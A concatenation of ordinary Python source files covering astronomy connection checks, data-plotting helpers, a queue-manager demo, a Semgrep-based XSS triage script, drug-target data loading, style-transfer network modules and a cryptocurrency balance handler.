self.conndict.setdefault(k, []).append([cm_utils.get_astropytime(conn.start_gpstime),\n cm_utils.get_stopdate(conn.stop_gpstime)])\n\n def check_for_duplicate_connections(self):\n \"\"\"\n Checks all of the self.multiple keys to see if any of them overlap in time.\n If they do, it is a conflicting duplicate connection.\n Writes a class variable:\n duplicates - list - [[key, i, j], ...]\n List which keeps triplets of duplication information as the key and the\n indices of the conflicting times.\n\n Returns the number of duplicates found.\n \"\"\"\n self.ensure_conndict()\n if len(self.multiples) == 0:\n print(\"No duplications found.\")\n return 0\n self.duplicates = []\n for k in self.multiples:\n for i in range(len(self.conndict[k])):\n for j in range(i):\n if check_for_overlap(self.conndict[k][i], self.conndict[k][j]):\n self.duplicates.append([k, i, j])\n if len(self.duplicates):\n print('{} duplications found.'.format(len(self.duplicates)))\n for d in self.duplicates:\n i = self.conndict[d[0]][d[1]]\n j = self.conndict[d[0]][d[2]]\n print('\\t{} <1>{}-{} <2>{}-{}'.format(k, i[0], i[1], j[0], j[1]))\n else:\n print('No duplications found.')\n print('Out of {} connections checked.'.format(self.num_connections))\n return len(self.duplicates)\n\n def check_for_existing_connection(self, connection, at_date='now'):\n \"\"\"\n Checks whether the provided connection is already set up for the at_date provided.\n\n Parameters:\n ------------\n connection: connection list [upstream, rev, output_port, downstream, rev, input_port]\n at_date: date for the connection to be made\n \"\"\"\n\n at_date = cm_utils.get_astropytime(at_date)\n connection = [x.lower() for x in connection]\n k = ':'.join(connection)\n self.ensure_conndict()\n if k not in self.conndict.keys():\n return False\n for t in self.conndict[k]:\n if cm_utils.is_active(at_date, t[0], t[1]):\n print('Connection {} is already made for {} ({} - {})'.format(k, at_date, t[0], t[1]))\n return True\n return False\n\n\ndef check_part_for_overlapping_revisions(hpn, session=None):\n \"\"\"\n Checks hpn for parts that overlap in time. They are allowed, but\n may also signal unwanted behavior.\n\n Returns list of overlapping part revisions\n\n Parameters:\n ------------\n hpn: hera part name\n \"\"\"\n\n overlap = []\n revisions = cm_revisions.get_all_revisions(hpn, session)\n for i in range(len(revisions)):\n for j in range(i):\n interval_i = [revisions[i].started, cm_utils.get_stopdate(revisions[i].ended)]\n interval_j = [revisions[j].started, cm_utils.get_stopdate(revisions[j].ended)]\n if check_for_overlap(interval_i, interval_j):\n overlap.append([revisions[i], revisions[j]])\n\n if len(overlap) > 0:\n overlapping_revs_in_single_list = []\n for ol in overlap:\n overlapping_revs_in_single_list.append(ol[0])\n overlapping_revs_in_single_list.append(ol[1])\n s = '{} and {} are overlapping revisions of part {}'.format(\n ol[0].rev, ol[1].rev, hpn)\n warnings.warn(s)\n cm_revisions.show_revisions(overlapping_revs_in_single_list)\n return overlap\n","sub_path":"hera_mc/cm_health.py","file_name":"cm_health.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"321142074","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nfrom utils import features_target_split\nfrom statsmodels.graphics.gofplots import qqplot\nfrom scipy.stats import shapiro, normaltest\n\ndef get_class_counts(df, target, display='all', subtitle=None):\n '''\n Plots a countplot of column.\n display options are number, percent or all\n '''\n fig = plt.figure(figsize=(7,7))\n g = sns.countplot(df[target])\n for p in g.patches:\n if display == 'all':\n g.annotate ('{}\\n\\n{:.2f}%\\n'.format (p.get_height(), 100*p.get_height()/len(df)), (p.get_x(), p.get_height()+10), bbox=dict(boxstyle='round', alpha=0.1, color='grey'))\n elif display == 'number':\n g.annotate('{}'.format(p.get_height()),(p.get_x(), p.get_height()+10), bbox=dict(boxstyle='round', alpha=0.1, color='grey'))\n elif display == 'percent':\n g.annotate('{:.2f}%'.format(100*p.get_height()/len(df)),(p.get_x(), p.get_x(), p.get_height()+10),bbox = dict(boxstyle='round', alpha=0.1, color='grey') )\n else:\n raise ValueError('Display must be either of number, percent or all')\n g.set_ylim(0, max([p.get_height()*1.15 for p in g.patches]))\n g.text (x=0.5, y=1.07, s=f'Count plot of {target}', fontsize=16, weight='bold', ha='center', va='bottom', transform=g.transAxes, color='navy')\n if subtitle:\n g.text(x=0.5, y=1.03, s=f'{subtitle}', fontsize=12, alpha=0.75, ha='center', va ='bottom', transform=g.transAxes, color='darkblue')\n if any ([p.get_height()/len(df)<0.2 for p in g.patches]):\n fig.text(x=1, y=0.5, s='Imbalanced dataset', bbox=dict(boxstyle='round', color='red', alpha=0.7), color='white', fontsize=14)\n else:\n fig.text(x=1, y=0.5, s='Balanced dataset', bbox = dict(boxstyle='round', color='green', alpha=0.7), color='white', fontsize=14)\n plt.show()\n\n\n\ndef normality_plots(df, col):\n \"\"\"\n Plots distplot, QQ-plot and runs Shapiro test for verifying Gaussian distribution\n \"\"\"\n\n fig = plt.figure(figsize=(15, 5))\n shapiro_p = round(shapiro(df[col])[1], 2)\n normaltest_p = round(normaltest(df[col])[1], 2)\n plt.subplot(1, 3, 1)\n plt.title('Histogram for '+col, color='navy', fontsize=12)\n plt.hist(df[col])\n plt.subplot(1, 3, 2)\n plt.title('Q-Q Plot for '+col, color='brown', fontsize=12)\n qqplot(df[col], line='s', ax=plt.subplot(1, 3, 2))\n plt.subplot(1, 3, 3)\n plt.title('Normality Test Results for '+col, color='olive', fontsize=12)\n plt.plot([shapiro_p, normaltest_p], linestyle=' ', marker='x')\n plt.text(x=0.2, y=0.5, s='Shapiro\\np value\\n'+str(shapiro_p))\n plt.text(x=0.6, y=0.5, s='Normaltest\\np value\\n'+str(normaltest_p))\n plt.ylim((0, 1))\n plt.hlines(y=0.05, color='r', xmin=0, xmax=1)\n fig.text(x=0.5, y=1.07, s=f'Normality Test for {col}', fontsize=16, weight='bold',\n ha='center', va='bottom', color='navy')\n\n if all(st > 0.05 for st in [shapiro_p, normaltest_p]):\n fig.text(x=0.5, y=1.03, s=f'Distribution is Gaussian', fontsize=14,\n ha='center', va='bottom', color='darkblue')\n else:\n fig.text(x=0.5, y=1.03, s=f'Distribution is Skewed', fontsize=14,\n ha='center', va='bottom', color='darkblue')\n\n #plt.suptitle('Normality Test for '+col, fontsize=16, color='b')\n plt.show()\n","sub_path":"insurance_risk_analysis/packages/eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"451788169","text":"import queue\nimport random\nfrom multiprocessing.managers import BaseManager\n\ntq, rq = queue.Queue(), queue.Queue()\n\n\ndef return_task_queue():\n return tq\n\n\ndef return_result_queue():\n return rq\n\n\nclass QueueManagerForMaster(BaseManager):\n\n def __init__(self, address=None, authkey=None, serialize='pickle',\n ctx=None):\n BaseManager.__init__(self, address, authkey, serialize, ctx)\n self.task_queue, self.result_queue = None, None\n\n # callable使用lambda报错\n self.register('get_task_queue', callable=return_task_queue)\n self.register('get_result_queue', callable=return_result_queue)\n\n def put(self, item=None, block=True, timeout=None):\n self.task_queue.put(item, block, timeout)\n\n def get(self, block=True, timeout=None):\n return self.result_queue.get(block, timeout)\n\n def start(self):\n BaseManager.start(self)\n\n # 加载任务队列和结果队列\n if not self.task_queue:\n self.task_queue = self.get_task_queue()\n\n if not self.result_queue:\n self.result_queue = self.get_result_queue()\n\n\ndef main():\n manager = QueueManagerForMaster(('127.0.0.1', 5000), b'123456')\n manager.start()\n\n for loop in range(10):\n num = random.randint(0, 10000)\n print('Put task %d...' % num)\n manager.put(num)\n\n for loop in range(10):\n r = manager.get()\n print('Result: %s' % r)\n\n manager.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"multitask/distributedprocess/task_master.py","file_name":"task_master.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"416668970","text":"import argparse\nimport json\nimport logging\nimport pandas as pd\nimport os\nimport requests\nimport subprocess\nimport sys\nimport math\nfrom sqlalchemy.orm.exec import MultipleResultsFound\nfrom app import app\nfrom models import Finding, TriageStatus\nfrom util import cwd, git_checkout\nfrom database import db\n\nlogger = logging.getLogger(__file__)\nlogger.setLevel(logging.DEBUG)\nhandler = logging.StreamHandler(stream=sys.stderr)\nhandler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\nlogger.addHandler(handler)\n\nDOWNLOADED_REPO_DIRECTORY = \"downloaded_repos\"\nPACK_URL = \"https://semgrep.dev/c/p/xss\"\nLOCAL_RULESET_FILE = os.path.join(os.getcwd(), \"semgrep.yaml\")\nLEN_CMD = 3\n\nSUPPORTED_LANG_EXTS_XSS = [\n \".go\",\n \".java\",\n \".js\",\n \".json\",\n \".py\",\n \".rb\",\n \".ts\",\n \".jsx\",\n \".tsx\",\n \".html\",\n \".erb\",\n \".jsp\",\n \".yml\"\n]\n\nwith app.app_context():\n db.create_all()\n\ndef parse_args():\n args = argparse.ArgumentParser(\n description=\"\"\"\n Automates the process of triaging XSS research results by generating\n diffs of semgrep runs on parent and child commits, along with the\n git diffs if needed.\n \"\"\",\n formatter_class=argparse.RawTextHelpFormatter\n )\n\n args.add_argument(\n \"-i\",\n \"--input\",\n action=\"store\",\n required=True,\n help=\"The JSON file containing information on bigQuery results.\"\n )\n\n args.add_argument(\n \"--diffs-only\",\n action=\"store_true\",\n required=False,\n help=\"Only run semgrep on the diffs between the two commits.\"\n )\n\n return args.parse_args()\n\ndef download_ruleset(ruleset_url: str, download_path: str = LOCAL_RULESET_FILE) -> str:\n logger.info(f\"Downloading ruleset '{ruleset_url}' to file '{download_path}'\")\n with open(download_path, 'w') as fout:\n fout.write(requests.get(ruleset_url).text)\n return os.path.abspath(download_path)\n\ndef download_repo(row, path: str):\n repo_name = row[\"repository\"]\n git_url = \"https://github.com/\" + repo_name + \".git\"\n logger.info(f\"Downloading repo '{git_url}'\")\n # download repositories and semgrep diff/ git diff them\n with cwd(DOWNLOADED_REPO_DIRECTORY):\n subprocess.run([\"git\", \"clone\", git_url, repo_name])\n\ndef get_diff_text(path: str, old_commit: str, new_commit: str) -> str:\n logger.info(f\"Running git diff on '{path}'\")\n with cwd(path):\n p = subprocess.run([\"git\", \"--no-pager\", \"diff\", old_commit, new_commit], capture_output=True)\n if p.returncode != 0:\n return \"git diff run returned an error.\"\n diff_text = p.stdout\n try:\n return diff_text.decode('utf-8')\n except UnicodeDecodeError:\n return \"Couldn't decode git diff output.\"\n\ndef get_git_diff_files(path: str, old_commit: str, new_commit: str):\n with cwd(path):\n p = subprocess.run([\"git\", \"diff\", \"--name-only\", old_commit, new_commit], stdout=subprocess.PIPE)\n if p.returncode != 0:\n return \"git diff for files only returned an error.\"\n try:\n git_diff_files = p.stdout.decode('utf-8')\n except UnicodeDecodeError:\n return \"Couldn't decode git diff files.\"\n\n git_diff_list = list(git_diff_files.split(\"\\n\"))\n if len(git_diff_list) > 0:\n git_diff_list = git_diff_list[:-1]\n return git_diff_list\n\ndef lang_supported(git_diff_files: list) -> bool:\n # if more than 20% of files is of an extension we don't support, skip.\n unsupported_files = 0\n max_unsupported_files = math.floor(len(git_diff_files)/5)\n for file in git_diff_files:\n filename, file_extension = os.path.splitext(file)\n if not file_extension in SUPPORTED_LANG_EXTS_XSS:\n unsupported_files += 1\n if unsupported_files > max_unsupported_files:\n logger.info(f\"This repository has {unsupported_files} file(s) in languages that are not supported.\")\n return False\n return True\n\ndef get_semgrep_results(path: str, old_commit: str, new_commit: str) -> str:\n git_diff_list = get_git_diff_files(path, old_commit, new_commit)\n # if git diff list doesn't return error, run lang_supported.\n if (type(git_diff_list) != str):\n if (not lang_supported(git_diff_list)):\n return \"Not Supported.\"\n with cwd(path):\n with git_checkout(old_commit):\n p = subprocess.run([\"semgrep\", \"-f\", LOCAL_RULESET_FILE], stdout=subprocess.PIPE)\n try:\n results = p.stdout.decode('utf-8')\n except UnicodeDecodeError:\n return \"Could not decode git diff output.\"\n return results\n\ndef get_semgrep_results_for_changed_files(path: str, old_commit: str, new_commit: str)-> str:\n # get files that had diffs.\n logger.info(f\"Running Semgrep on '{path}'\")\n git_diff_list = get_git_diff_files(path, old_commit, new_commit)\n if (not lang_supported(git_diff_list)):\n return \"Not Supported.\"\n\n with cwd(path):\n with git_checkout(old_commit):\n cmd = ['semgrep', '--config', LOCAL_RULESET_FILE]\n for file_name in git_diff_list:\n file_name = file_name.strip()\n # check if the file exists in the old directory\n if os.path.exists(file_name):\n cmd.append(file_name)\n if (len(cmd) == LEN_CMD):\n return \"Only added files diff'ed.\"\n p = subprocess.run(cmd, stdout=subprocess.PIPE)\n if p.returncode != 0:\n return \"semgrep run returned an error.\"\n try:\n return p.stdout.decode('utf-8')\n except UnicodeDecodeError:\n return \"Couldn't decode semgrep output.\"\n\ndef post_to_db(row, git_diff_text: str, semgrep_diff_text: str):\n repo_name = row[\"repository\"]\n repo_url = \"https://github.com/\" + repo_name\n row_to_add = Finding(\n repo_url=repo_url,\n repo_message=row[\"message\"],\n fix_commit=row[\"commit\"],\n previous_commit= row[\"parent\"][0],\n diff_text=git_diff_text,\n semgrep_results_on_diff=semgrep_diff_text,\n triage_status=TriageStatus(0),\n reviewer_notes=\"\",\n )\n with app.app_context():\n db.session.add(row_to_add)\n db.session.commit()\n\ndef analyze_repos(table, diffs_only: bool):\n download_ruleset(PACK_URL, LOCAL_RULESET_FILE)\n for index, row in table.iterrows():\n repo_name = row[\"repository\"]\n repo_path = os.path.join(DOWNLOADED_REPO_DIRECTORY, repo_name)\n repo_url = \"https://github.com/\" + repo_name\n # first check if repo already in db. If it is, skip.\n with app.app_context():\n try:\n repo_exists = db.session.query(Finding.id).filter(\n Finding.repo_url==repo_url,\n Finding.fix_commit==row[\"commit\"]).scalar()\n except MultipleResultsFound:\n repo_exists = 1\n if not repo_exists is None:\n logger.info(f\"Skipping '{repo_name} because it is already in the database.\")\n continue\n if not os.path.exists(repo_path):\n logger.info(f\"Repository '{repo_name}' has not been downloaded. Downloading...\")\n logger.info(f\"Creating directory '{repo_path}'\")\n os.makedirs(repo_path)\n download_repo(row, repo_path)\n\n git_diff_text = get_diff_text(repo_path, row[\"parent\"][0], row[\"commit\"])\n if diffs_only:\n semgrep_diff_text = get_semgrep_results_for_changed_files(repo_path, row[\"parent\"][0], row[\"commit\"])\n else:\n semgrep_diff_text = get_semgrep_results(repo_path, row[\"parent\"][0], row[\"commit\"])\n if not semgrep_diff_text == \"Not Supported.\":\n post_to_db(row, git_diff_text, semgrep_diff_text)\n\ndef main() -> None:\n args = parse_args()\n # transform json dump into table\n table = pd.read_json(args.input, orient=\"split\")\n analyze_repos(table, args.diffs_only)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"server/xss_research/automate_diffs.py","file_name":"automate_diffs.py","file_ext":"py","file_size_in_byte":8036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"482317721","text":"'''\nDeborah Barndt\n2-20-19\nSortedList.py\nhw5: Question 1 Sorted List\n\nThis program will prompt the user to enter a list and display whether the list\nis sorted or not sorted. \n\nWritten by Deborah Barndt.\n'''\n\n# Function that returns true if the list is already sorted in increasing order.\ndef isSorted(lst):\n for i in range(len(lst) - 1):\n if (lst[i] > lst[i + 1]):\n return False\n return True\n\n# Function that will prompt the user to enter a list and then displays whether\n# the list is sorted or is not sorted.\ndef main():\n enterAgain = 'y'\n\n while (enterAgain == 'y'):\n lst = input('Please enter a list of numbers with spaces: ')\n\n lst = lst.split(' ')\n\n for i in range(len(lst)):\n lst[i] = int(lst[i])\n if isSorted(lst):\n print('The list is already sorted.')\n\n # Ask the user if they would like to enter another list.\n enterAgain = input('\\nWould you like to enter another list? (y/n) ')\n else:\n print('The list is not sorted.')\n\n # Ask the user if they would like to enter another list.\n enterAgain = input('\\nWould you like to enter another list? (y/n) ')\n\n if (enterAgain == 'n'):\n print('\\nThank you. Please come again.')\n\n\n# Call the main function to begin the test program.\nmain()\n","sub_path":"ITMD_513/hw5/SortedList.py","file_name":"SortedList.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"47002412","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Date : 9/5/2017\r\n# @Author : Ying Sun\r\n# @Link : yinsun@microsoft.com\r\n# @Version : 0.1\r\n\r\nclass Dog(object):\r\n\r\n def __init__(self,name):\r\n self.name = name\r\n\r\n def eat(self, food):\r\n print('%s is eating... %s' % (self.name, food))\r\n\r\ndef bulk(name):\r\n print('%s is yelling ....' %name)\r\n\r\nd = Dog('Tom')\r\n\r\nwhile True:\r\n choice = input(\">>:\").strip()\r\n\r\n if hasattr(d,choice):\r\n func = getattr(d, choice)\r\n func(\"cherry\")\r\n else:\r\n setattr(d,choice,bulk)\r\n getattr(d,choice)('a user')\r\n\r\n","sub_path":"5_Class/reflect_class.py","file_name":"reflect_class.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"417570373","text":"import json\nimport pickle\nfrom collections import OrderedDict\nimport numpy as np\nfrom rdkit.Chem import AllChem as Chem\nimport argparse\nfrom utils.data_utils import load_shortest_paths\nfrom dataset import *\n\nparser = argparse.ArgumentParser()\nwith open('params.txt', 'r') as f:\n params = f.read()\n\n\nclass Args:\n pass\n\nparam_dict = {}\nitems = params.split()\nfor item in items:\n key, value = item.split('=')\n try:\n value = int(value)\n except ValueError:\n try:\n value = float(value)\n except ValueError:\n pass\n if value == '':\n value = None\n param_dict[key] = value\nargs = Args()\nargs.__dict__.update(param_dict)\n\nargs.data = 'data/kiba'\nload_shortest_paths(args)\ndrug_dataset = MolDataset(read_smiles_from_file('data/kiba/raw.csv'), args)\n\n# for converting protein sequence to categorical format\nseq_voc = \"ABCDEFGHIKLMNOPQRSTUVWXYZ\"\nseq_dict = {v:i for i,v in enumerate(seq_voc)}\nseq_dict_len = len(seq_dict)\nmax_seq_len = 1000 # Note that all protein data will have the same length 1000\n\ndef seq_to_cat(prot):\n x = np.zeros(max_seq_len)\n for i, ch in enumerate(prot[:max_seq_len]):\n x[i] = seq_dict[ch]\n return x\n\nfpath = 'data/kiba/'\n\n# Read in drugs and proteins\ndrugs_ = json.load(open(fpath + \"ligands_can.txt\"), object_pairs_hook=OrderedDict)\ndrugs = np.array([Chem.MolToSmiles(Chem.MolFromSmiles(d),isomericSmiles=True) for d in drugs_.values()])\nproteins_ = json.load(open(fpath + \"proteins.txt\"), object_pairs_hook=OrderedDict)\nproteins = np.array(list(proteins_.values()))\n\n# Read in affinity data\naffinity = np.array(pickle.load(open(fpath + \"Y\",\"rb\"), encoding='latin1'))\n\n# Read in train/test fold\ntrain_fold = json.load(open(fpath + \"folds/train_fold_setting1.txt\"))\ntrain_fold = [ee for e in train_fold for ee in e ]\n'''\nHere all validation folds are aggregated into training set. \nIf you want to train models with different architectures and/or \noptimize for model hyperparameters, we encourage you to use 5-fold \ncross validation as provided here.\n'''\ntest_fold = json.load(open(fpath + \"folds/test_fold_setting1.txt\"))\n\n# Prepare train/test data with fold indices\nrows, cols = np.where(np.isnan(affinity)==False)\ndrugs_tr = drugs[rows[train_fold]]\ndrugs_tr_ind = rows[train_fold]\nproteins_tr = np.array([seq_to_cat(p) for p in proteins[cols[train_fold]]])\naffinity_tr = affinity[rows[train_fold], cols[train_fold]]\n\ndrugs_ts = drugs[rows[test_fold]]\ndrugs_ts_ind = rows[test_fold]\nproteins_ts = np.array([seq_to_cat(p) for p in proteins[cols[test_fold]]])\naffinity_ts = affinity[rows[test_fold], cols[test_fold]]\n","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"310194139","text":"import torch\nimport torch.nn as nn\n\ndef calc_mean_std(feat, eps=1e-5):\n # eps is a small value added to the variance to avoid divide-by-zero.\n size = feat.size()\n assert (len(size) == 4)\n N, C = size[:2]\n feat_var = feat.view(N, C, -1).var(dim=2) + eps\n feat_std = feat_var.sqrt().view(N, C, 1, 1)\n feat_mean = feat.view(N, C, -1).mean(dim=2).view(N, C, 1, 1)\n return feat_mean, feat_std\n\ndef calc_emd_loss(pred, target):\n b, _, h, w = pred.shape\n pred = pred.reshape([b, -1, w * h])\n pred_norm = torch.sqrt((pred**2).sum(1).reshape([b, -1, 1]))\n pred = pred.transpose(2, 1)\n target_t = target.reshape([b, -1, w * h])\n target_norm = torch.sqrt((target**2).sum(1).reshape([b, 1, -1]))\n similarity = torch.bmm(pred, target_t) / pred_norm / target_norm\n dist = 1. - similarity\n return dist\n\ndef adaptive_instance_normalization(content_feat, style_feat):\n assert (content_feat.size()[:2] == style_feat.size()[:2])\n size = content_feat.size()\n style_mean, style_std = calc_mean_std(style_feat)\n content_mean, content_std = calc_mean_std(content_feat)\n\n normalized_feat = (content_feat - content_mean.expand(\n size)) / content_std.expand(size)\n return normalized_feat * style_std.expand(size) + style_mean.expand(size)\n\n\ndef mean_normalization(feat):\n size = feat.size()\n mean, std = calc_mean_std(feat)\n normalized_feat = (feat - mean.expand(size))/std.expand(size)\n return normalized_feat\n \n\nclass Attention(nn.Module):\n def __init__(self, num_features):\n super(Attention, self).__init__()\n self.query_conv = nn.Conv2d(num_features, num_features, (1, 1))\n self.key_conv = nn.Conv2d(num_features, num_features, (1, 1))\n self.value_conv = nn.Conv2d(num_features, num_features, (1, 1))\n self.softmax = nn.Softmax(dim = -1)\n nn.init.xavier_uniform_(self.query_conv.weight)\n nn.init.uniform_(self.query_conv.bias, 0.0, 1.0)\n nn.init.xavier_uniform_(self.key_conv.weight)\n nn.init.uniform_(self.key_conv.bias, 0.0, 1.0)\n nn.init.xavier_uniform_(self.value_conv.weight)\n nn.init.uniform_(self.value_conv.bias, 0.0, 1.0)\n \n def forward(self, content_feat, style_feat):\n Query = self.query_conv(mean_normalization(content_feat))\n Key = self.key_conv(mean_normalization(style_feat))\n Value = self.value_conv(style_feat)\n batch_size, channels, height_c, width_c = Query.size()\n Query = Query.view(batch_size, -1, width_c * height_c).permute(0, 2, 1)\n batch_size, channels, height_s, width_s = Key.size()\n Key = Key.view(batch_size, -1, width_s * height_s)\n Attention_Weights = self.softmax(torch.bmm(Query, Key))\n\n Value = Value.view(batch_size, -1, width_s * height_s)\n Output = torch.bmm(Value, Attention_Weights.permute(0, 2, 1))\n Output = Output.view(batch_size, channels, height_c, width_c)\n return Output\n\n\nclass SAFIN(nn.Module):\n def __init__(self, num_features):\n super().__init__()\n self.num_features = num_features\n self.shared_weight = nn.Parameter(torch.Tensor(num_features), requires_grad=True)\n self.shared_bias = nn.Parameter(torch.Tensor(num_features), requires_grad=True)\n self.shared_pad = nn.ReflectionPad2d((1, 1, 1, 1))\n self.gamma_conv = nn.Conv2d(num_features, num_features, (1, 1))\n self.beta_conv = nn.Conv2d(num_features, num_features, (1, 1))\n self.attention = Attention(num_features)\n self.relu = nn.ReLU()\n nn.init.ones_(self.shared_weight)\n nn.init.zeros_(self.shared_bias)\n nn.init.xavier_uniform_(self.gamma_conv.weight)\n nn.init.uniform_(self.gamma_conv.bias, 0.0, 1.0)\n nn.init.xavier_uniform_(self.beta_conv.weight)\n nn.init.uniform_(self.beta_conv.bias, 0.0, 1.0)\n\n def forward(self, content_feat, style_feat, output_shared=False):\n assert (content_feat.size()[:2] == style_feat.size()[:2])\n size = content_feat.size()\n style_feat = self.attention(content_feat, style_feat)\n style_gamma = self.relu(self.gamma_conv(style_feat))\n style_beta = self.relu(self.beta_conv(style_feat))\n content_mean, content_std = calc_mean_std(content_feat)\n\n normalized_feat = (content_feat - content_mean.expand(\n size)) / content_std.expand(size)\n shared_affine_feat = normalized_feat * self.shared_weight.view(1, self.num_features, 1, 1).expand(size) + \\\n self.shared_bias.view(1, self.num_features, 1, 1).expand(size)\n if output_shared:\n return shared_affine_feat\n output = shared_affine_feat * style_gamma + style_beta\n return output\n\n\nclass GANLoss(nn.Module):\n \"\"\"Define different GAN objectives.\n\n The GANLoss class abstracts away the need to create the target label tensor\n that has the same size as the input.\n \"\"\"\n def __init__(self,\n gan_mode,\n target_real_label=1.0,\n target_fake_label=0.0,\n loss_weight=1.0,\n device=None):\n super(GANLoss, self).__init__()\n # when loss weight less than zero return None\n if loss_weight <= 0:\n return None\n\n self.target_real_label = target_real_label\n self.target_fake_label = target_fake_label\n self.loss_weight = loss_weight\n self.device = device\n\n self.gan_mode = gan_mode\n if gan_mode == 'lsgan':\n self.loss = nn.MSELoss()\n elif gan_mode == 'vanilla':\n self.loss = nn.BCEWithLogitsLoss()\n elif gan_mode in ['wgan', 'wgangp', 'hinge', 'logistic']:\n self.loss = None\n else:\n raise NotImplementedError('gan mode %s not implemented' % gan_mode)\n\n def get_target_tensor(self, prediction, target_is_real):\n if target_is_real:\n if not hasattr(self, 'target_real_tensor'):\n self.target_real_tensor = torch.full(\n prediction.shape,\n fill_value=self.target_real_label).float().to(self.device)\n target_tensor = self.target_real_tensor\n else:\n if not hasattr(self, 'target_fake_tensor'):\n self.target_fake_tensor = torch.full(\n prediction.shape,\n fill_value=self.target_fake_label).float().to(self.device)\n target_tensor = self.target_fake_tensor\n\n return target_tensor\n\n def __call__(self,\n prediction,\n target_is_real,\n is_disc=False,\n is_updating_D=None):\n if self.gan_mode in ['lsgan', 'vanilla']:\n target_tensor = self.get_target_tensor(prediction, target_is_real)\n loss = self.loss(prediction, target_tensor)\n elif self.gan_mode.find('wgan') != -1:\n if target_is_real:\n loss = -prediction.mean()\n else:\n loss = prediction.mean()\n elif self.gan_mode == 'hinge':\n if target_is_real:\n loss = F.relu(1 - prediction) if is_updating_D else -prediction\n else:\n loss = F.relu(1 + prediction) if is_updating_D else prediction\n loss = loss.mean()\n elif self.gan_mode == 'logistic':\n if target_is_real:\n loss = F.softplus(-prediction).mean()\n else:\n loss = F.softplus(prediction).mean()\n\n return loss if is_disc else loss * self.loss_weight\n\n\nclass Discriminator(nn.Module):\n def __init__(self, depth=5, num_channels=64, device=None):\n super(Discriminator, self).__init__()\n self.head = nn.Sequential(\n nn.Conv2d(3,num_channels,3,stride=1,padding=1),\n nn.BatchNorm2d(num_channels),\n nn.LeakyReLU(0.2)\n )\n self.body = []\n for i in range(depth - 2):\n self.body.append(\n nn.Conv2d(num_channels,\n num_channels,\n kernel_size=3,\n stride=1,\n padding=1))\n self.body.append(nn.BatchNorm2d(num_channels))\n self.body.append(nn.LeakyReLU(0.2))\n self.body = nn.Sequential(*self.body)\n self.tail = nn.Conv2d(num_channels,\n 1,\n kernel_size=3,\n stride=1,\n padding=1)\n self.device = device\n self.ganloss = GANLoss('lsgan', device=self.device)\n\n def losses(self, real, fake):\n pred_real = self(real)\n loss_D_real = self.ganloss(pred_real, True)\n pred_fake = self(fake)\n loss_D_fake = self.ganloss(pred_fake, False)\n loss_D = (loss_D_real + loss_D_fake) * 0.5\n return loss_D\n\n def forward(self, x):\n x = self.head(x)\n x = self.body(x)\n x = self.tail(x)\n return x\n\ndef _calc_feat_flatten_mean_std(feat):\n # takes 3D feat (C, H, W), return mean and std of array within channels\n assert (feat.size()[0] == 3)\n assert (isinstance(feat, torch.FloatTensor))\n feat_flatten = feat.view(3, -1)\n mean = feat_flatten.mean(dim=-1, keepdim=True)\n std = feat_flatten.std(dim=-1, keepdim=True)\n return feat_flatten, mean, std\n\n\ndef _mat_sqrt(x):\n U, D, V = torch.svd(x)\n return torch.mm(torch.mm(U, D.pow(0.5).diag()), V.t())\n\n\ndef coral(source, target):\n # assume both source and target are 3D array (C, H, W)\n # Note: flatten -> f\n\n source_f, source_f_mean, source_f_std = _calc_feat_flatten_mean_std(source)\n source_f_norm = (source_f - source_f_mean.expand_as(\n source_f)) / source_f_std.expand_as(source_f)\n source_f_cov_eye = \\\n torch.mm(source_f_norm, source_f_norm.t()) + torch.eye(3)\n\n target_f, target_f_mean, target_f_std = _calc_feat_flatten_mean_std(target)\n target_f_norm = (target_f - target_f_mean.expand_as(\n target_f)) / target_f_std.expand_as(target_f)\n target_f_cov_eye = \\\n torch.mm(target_f_norm, target_f_norm.t()) + torch.eye(3)\n\n source_f_norm_transfer = torch.mm(\n _mat_sqrt(target_f_cov_eye),\n torch.mm(torch.inverse(_mat_sqrt(source_f_cov_eye)),\n source_f_norm)\n )\n\n source_f_transfer = source_f_norm_transfer * \\\n target_f_std.expand_as(source_f_norm) + \\\n target_f_mean.expand_as(source_f_norm)\n\n return source_f_transfer.view(source.size())\n","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":10585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"528531184","text":"# -*- coding: utf-8 -*-\n\"\"\"\nauthor: yqq\ndate: 2019-05-11 20:26\ndescriptions: USDP处理\n\"\"\"\nimport json\n\nfrom base_handler import BaseHandler\nfrom utils import decimal_default,str_to_decimal,get_linenumber\nfrom .proxy import USDPProxy\nfrom constants import USDP_IP_ADDR, USDP_RPC_PORT\n\ng_IP, g_PORT = USDP_IP_ADDR, USDP_RPC_PORT\n\n \nclass USDP_GetBalance(BaseHandler):\n @staticmethod\n def get_balance(rpcconn, addr):\n balance = rpcconn.getBalance(addr)\n return balance\n\n def post(self):\n rpcconn = USDPProxy(g_IP, g_PORT)\n try:\n address = self.get_argument(\"address\")\n if len(address) != 43:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"arguments error\")))\n return\n balance = USDP_GetBalance.get_balance(rpcconn, address)\n self.write(json.dumps(BaseHandler.success_ret_with_data(str(balance)), default=decimal_default))\n except Exception as e:\n self.write(json.dumps(BaseHandler.error_ret_with_data(\"error: %s\"%e)))\n 